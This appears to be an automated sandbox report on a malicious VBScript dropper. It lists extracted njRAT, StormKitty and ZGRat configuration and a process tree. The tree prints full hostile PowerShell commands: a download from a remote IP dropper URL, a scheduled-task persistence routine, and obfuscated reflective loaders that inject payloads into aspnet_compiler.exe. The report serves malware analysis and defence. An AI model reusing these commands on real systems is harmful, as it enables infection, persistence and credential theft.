Analysis

  • max time kernel
    600s
  • max time network
    594s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-03-2024 19:06

General

  • Target

    xt.vbs

  • Size

    728B

  • MD5

    617b93b01b88973de9237d3115c73b7a

  • SHA1

    2b17b017b3b552d0d0744810a8b50420baf847d1

  • SHA256

    45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b

  • SHA512

    458c8c1239f88a19b83c5c370e7bf87efd4d57abc2a406e1ec5f6edabb95b6f644c384cc9669710529faf90e5c03890f7bb7e7a5a6a098d1e5b9fdca254c6d77

Malware Config

Extracted

Language

ps1 (deobfuscated)

URLs (exe.dropper)

http://45.80.158.168:222/x.jpg

Extracted

Language

ps1 (deobfuscated)

URLs (exe.dropper)

https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe

Extracted

Family

njrat

Version

Platinum

Botnet

HacKed By Ms47

C2

127.0.0.1:1177

Mutex

Client.exe

Attributes
  • reg_key

    Client.exe

  • splitter

    |Ghost|

Signatures

  • Detect ZGRat V1 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:508
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2388
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1616
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\run.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                7⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5008
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2572
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\get.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5060
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1584
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:592
          • C:\Users\Public\node.exe
            "C:\Users\Public\node.exe" C:\Users\Public\get.js
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3136
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:760
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Public\node.exe
      "C:\Users\Public\node.exe" C:\Users\Public\run.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            5⤵
              PID:4408
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Users\Public\node.exe
        "C:\Users\Public\node.exe" C:\Users\Public\run.js
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1452
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
                PID:1380
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                  PID:2320
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
          1⤵
            PID:1460
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k UnistackSvcGroup
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2308
          • C:\Windows\System32\WScript.exe
            C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
            1⤵
            • Checks computer location settings
            PID:3212
            • C:\Users\Public\node.exe
              "C:\Users\Public\node.exe" C:\Users\Public\run.js
              2⤵
                PID:2800
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
                  3⤵
                    PID:1408
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
                      4⤵
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4984
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                        5⤵
                          PID:4092
                • C:\Windows\System32\WScript.exe
                  C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
                  1⤵
                    PID:5028

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    3KB


                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    2KB


                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1

                    Filesize

                    60B


                  • C:\Users\Admin\AppData\Local\Temp\places.raw

                    Filesize

                    5.0MB


                  • C:\Users\Admin\AppData\Local\Temp\tmp3109.tmp.dat

                    Filesize

                    92KB


                  • C:\Users\Admin\AppData\Local\Temp\tmp313F.tmp.dat

                    Filesize

                    116KB


                  • C:\Users\Public\app.js

                    Filesize

                    373B


                  • C:\Users\Public\basta.js

                    Filesize

                    377B


                  • C:\Users\Public\get.js

                    Filesize

                    10KB


                  • C:\Users\Public\node.bat

                    Filesize

                    3KB


                  • C:\Users\Public\node_modules\archiver-utils\index.js

                    Filesize

                    3KB


                  • C:\Users\Public\node_modules\archiver-utils\package.json

                    Filesize

                    1KB


                  • C:\Users\Public\node_modules\archiver\index.js

                    Filesize

                    2KB


                  • C:\Users\Public\node_modules\archiver\lib\core.js

                    Filesize

                    23KB

                  • C:\Users\Public\node_modules\archiver\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\async\dist\async.js

                    Filesize

                    219KB

                  • C:\Users\Public\node_modules\async\package.json

                    Filesize

                    2KB

                  • C:\Users\Public\node_modules\async\reduce.js

                    Filesize

                    4KB

                  • C:\Users\Public\node_modules\balanced-match\index.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\balanced-match\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\brace-expansion\index.js

                    Filesize

                    4KB

                  • C:\Users\Public\node_modules\brace-expansion\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\core-util-is\lib\util.js

                    Filesize

                    2KB

                  • C:\Users\Public\node_modules\core-util-is\package.json

                    Filesize

                    799B

                  • C:\Users\Public\node_modules\graceful-fs\clone.js

                    Filesize

                    496B

                  • C:\Users\Public\node_modules\graceful-fs\graceful-fs.js

                    Filesize

                    12KB

                  • C:\Users\Public\node_modules\graceful-fs\legacy-streams.js

                    Filesize

                    2KB

                  • C:\Users\Public\node_modules\graceful-fs\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\graceful-fs\polyfills.js

                    Filesize

                    9KB

                  • C:\Users\Public\node_modules\inherits\inherits.js

                    Filesize

                    250B

                  • C:\Users\Public\node_modules\inherits\package.json

                    Filesize

                    581B

                  • C:\Users\Public\node_modules\isarray\index.js

                    Filesize

                    132B

                  • C:\Users\Public\node_modules\isarray\package.json

                    Filesize

                    958B

                  • C:\Users\Public\node_modules\lazystream\lib\lazystream.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_duplex.js

                    Filesize

                    3KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_passthrough.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_readable.js

                    Filesize

                    30KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_transform.js

                    Filesize

                    7KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_writable.js

                    Filesize

                    19KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\BufferList.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\destroy.js

                    Filesize

                    2KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\internal\streams\stream.js

                    Filesize

                    36B

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\passthrough.js

                    Filesize

                    51B

                  • C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\readable.js

                    Filesize

                    771B

                  • C:\Users\Public\node_modules\lazystream\node_modules\safe-buffer\index.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lazystream\node_modules\safe-buffer\package.json

                    Filesize

                    783B

                  • C:\Users\Public\node_modules\lazystream\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lodash\_apply.js

                    Filesize

                    714B

                  • C:\Users\Public\node_modules\lodash\_baseRest.js

                    Filesize

                    559B

                  • C:\Users\Public\node_modules\lodash\_overRest.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lodash\_setToString.js

                    Filesize

                    392B

                  • C:\Users\Public\node_modules\lodash\defaults.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\lodash\fp\property.js

                    Filesize

                    35B

                  • C:\Users\Public\node_modules\lodash\identity.js

                    Filesize

                    370B

                  • C:\Users\Public\node_modules\lodash\package.json

                    Filesize

                    578B

                  • C:\Users\Public\node_modules\lodash\valueOf.js

                    Filesize

                    44B

                  • C:\Users\Public\node_modules\minimatch\lib\path.js

                    Filesize

                    151B

                  • C:\Users\Public\node_modules\minimatch\minimatch.js

                    Filesize

                    28KB

                  • C:\Users\Public\node_modules\minimatch\package.json

                    Filesize

                    720B

                  • C:\Users\Public\node_modules\normalize-path\index.js

                    Filesize

                    1024B

